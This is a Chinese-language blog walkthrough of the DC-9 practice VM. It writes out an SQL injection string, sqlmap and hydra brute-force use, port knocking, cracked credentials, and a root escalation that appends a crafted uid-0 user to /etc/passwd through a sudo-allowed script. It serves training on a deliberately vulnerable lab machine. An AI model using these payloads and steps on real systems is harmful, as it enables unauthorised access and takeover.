freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC系列靶机丨DC9
小白学安全 2023-01-26 14:55:28 134548
所属地 四川省

信息收集

确定主机IP

netdiscover -i eth0 -r 192.168.84.0/24

image-20221221165610497


扫描端口

image-20221221170313251

image-20221221174352328

nmap 漏洞扫描

image-20221221170425338

image-20221221170642497

web测试

对检索出来的目录进行测试

搜索框

image-20221221171140690

您可以使用名字或姓氏进行搜索,可能会与数据库连接

当作搜索框输入1' or 1=1 -- qwe时,所有信息会被检索出来

image-20221221171409105


使用burp抓取请求数据,使用sqlmao跑包

image-20221221171539057

image-20221221171902773


image-20221221171913427


跑库-跑表-跑字段

image-20221221172409794

image-20221221172629932

image-20221221173103239


解密后的账户密码为:admin、transorbital1


登录

image-20221221173204136

页面多了一个添加记录功能

image-20221221173312784


在添加记录页面中,最下方有一个文件不存在

image-20221221173418704

是否是通过传参呢

验证

image-20221221173505926


添加多个跳转符,出现内容

image-20221221173602122

该处存在文件包含漏洞


读取apache 2.4的配置文件

nmap扫描到有22端口,但是流量都被过滤了,怀疑有knockd服务

knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。
不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性

image-20221221173826229


因此使用masscan依次扫描该ip对应的三个端口

nmap 192.168.84.185 -p 7469

nmap 192.168.84.185 -p 8475

nmap 192.168.84.185 -p 9842

image-20221221175016808


将之前收集的用户详细信息用户爆破ssh端口

image-20221221175443926

分别存放于username.txt和pw.txt

hydra进行爆破

image-20221221180259535


使用 janitor账户进行登录ssh

janitor、Ilovepeepee

image-20221221180538459


发现一个隐藏目录

image-20221221180915691

存放密码

image-20221221181015922


将密码再次进行爆破,得到新的内容

image-20221221181226323

fredf、B4-Tru3-001


直接su 切换

image-20221221181321379


提权

sudo -l

image-20221221181347354

发现test文件不需要root的密码即可运行


查看test文件

打开test文件后,乱码,但可以根据部分单词判断该文件大概率为python文件

使用find命令 查找test.py文件

find / -name test.py 2>/dev/null

2>/dev/null 代表忽略掉错误提示信息。

image-20221221181758253


查看该文件

image-20221221181836885


py文件的含义为:读取参数1的内容,然后将参数1的内容写入到参数2的内容中。


提权思路

构造一个root权限用户,将该用户信息写入文件内,将改文件作为参数1,/etc/passwd作为参数2,这样就创建了一个root权限用户,就能实现提权了


构造payload

openssl passwd -1 -salt admin 123456

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
admin 123456 用户名和密码

image-20221221182112312

得到序列值为1admin$LClYcRe.ee8dQwgrFc5nz.


根据/etc/passwd的格式,修改一下,然后存入一个文件里,这个文件就是参数1

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
# 用户名:密码:uid:gid:家目录:登陆后使用的shell

sudo ./test /tmp/passwd /etc/passwd    

image-20221221182428414

image-20221221182537173


flag

image-20221221182605632



# web安全 # 漏洞分析 # 漏洞复现 # DC靶机
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 小白学安全 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
小白学安全 LV.4
微信公众号关注【小白学安全】 一一一一 xbxaq.com
  • 9 文章数
  • 5 关注者
DC系列靶机丨DC8
2023-01-26
DC系列靶机丨DC7
2023-01-26
DC系列靶机丨DC6
2023-01-26
文章目录